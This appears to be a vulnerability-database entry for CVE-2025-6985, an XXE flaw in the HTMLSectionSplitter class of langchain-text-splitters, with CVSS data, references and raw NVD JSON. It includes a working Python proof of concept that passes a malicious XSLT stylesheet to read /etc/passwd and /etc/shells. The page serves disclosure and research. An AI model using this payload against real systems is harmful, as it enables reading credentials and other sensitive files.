CVE-2025-6985

Description

The HTMLSectionSplitter class in langchain-text-splitters version 0.3.8 is vulnerable to XML External Entity (XXE) attacks due to unsafe XSLT parsing. This vulnerability arises because the class allows the use of arbitrary XSLT stylesheets, which are parsed using lxml.etree.parse() and lxml.etree.XSLT() without any hardening measures. In lxml versions up to 4.9.x, external entities are resolved by default, allowing attackers to read arbitrary local files or perform outbound HTTP(S) fetches. In lxml versions 5.0 and above, while entity expansion is disabled, the XSLT document() function can still read any URI unless XSLTAccessControl is applied. This vulnerability allows remote attackers to gain read-only access to any file the LangChain process can reach, including sensitive files such as SSH keys, environment files, source code, or cloud metadata. No authentication, special privileges, or user interaction are required, and the issue is exploitable in default deployments that enable custom XSLT.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

langchain-text-splitters == 0.3.8

lxml <= 4.9.x（默认实体解析）

lxml >= 5.0.0（未配置XSLTAccessControl）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-6985 PoC - XXE via XSLT in langchain-text-splitters
# Vulnerability: HTMLSectionSplitter allows arbitrary XSLT parsing without hardening

from langchain_text_splitters import HTMLSectionSplitter

# Malicious XSLT stylesheet with external entity injection
# This XSLT uses document() function to read local files
malicious_xslt = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xsl:stylesheet [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <output>
      <file_content>&xxe;</file_content>
      <!-- Alternative: use document() to read arbitrary files -->
      <secret_content>
        <xsl:copy-of select="document('file:///etc/shells')"/>
      </secret_content>
    </output>
  </xsl:template>
</xsl:stylesheet>"""

# HTML content to be processed
html_content = """
<html>
<head><title>Test</title></head>
<body>
<h1>Section Header</h1>
<p>This is test content for the splitter.</p>
</body>
</html>
"""

# Trigger the vulnerability by providing malicious XSLT
splitter = HTMLSectionSplitter(
    headers_to_split_on=[("h1", "Header 1")],
    xslt_stylesheet=malicious_xslt  # Vulnerable: no sanitization applied
)

# Process HTML - this will trigger XXE and read /etc/passwd
chunks = splitter.split_text(html_content)
for chunk in chunks:
    print(chunk.page_content)
    # The output will contain the contents of /etc/passwd

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-6985
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-6985
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-6985/
[4] VulDB https://vuldb.com/cve/CVE-2025-6985
[5] https://huntr.com/bounties/cf78abbb-df3b-43de-b6ee-132b73ff8331

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-6985", "sourceIdentifier": "[email protected]", "published": "2025-10-06T18:15:52.857", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HTMLSectionSplitter class in langchain-text-splitters version 0.3.8 is vulnerable to XML External Entity (XXE) attacks due to unsafe XSLT parsing. This vulnerability arises because the class allows the use of arbitrary XSLT stylesheets, which are parsed using lxml.etree.parse() and lxml.etree.XSLT() without any hardening measures. In lxml versions up to 4.9.x, external entities are resolved by default, allowing attackers to read arbitrary local files or perform outbound HTTP(S) fetches. In lxml versions 5.0 and above, while entity expansion is disabled, the XSLT document() function can still read any URI unless XSLTAccessControl is applied. This vulnerability allows remote attackers to gain read-only access to any file the LangChain process can reach, including sensitive files such as SSH keys, environment files, source code, or cloud metadata. No authentication, special privileges, or user interaction are required, and the issue is exploitable in default deployments that enable custom XSLT."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "references": [{"url": "https://huntr.com/bounties/cf78abbb-df3b-43de-b6ee-132b73ff8331", "source": "[email protected]"}]}}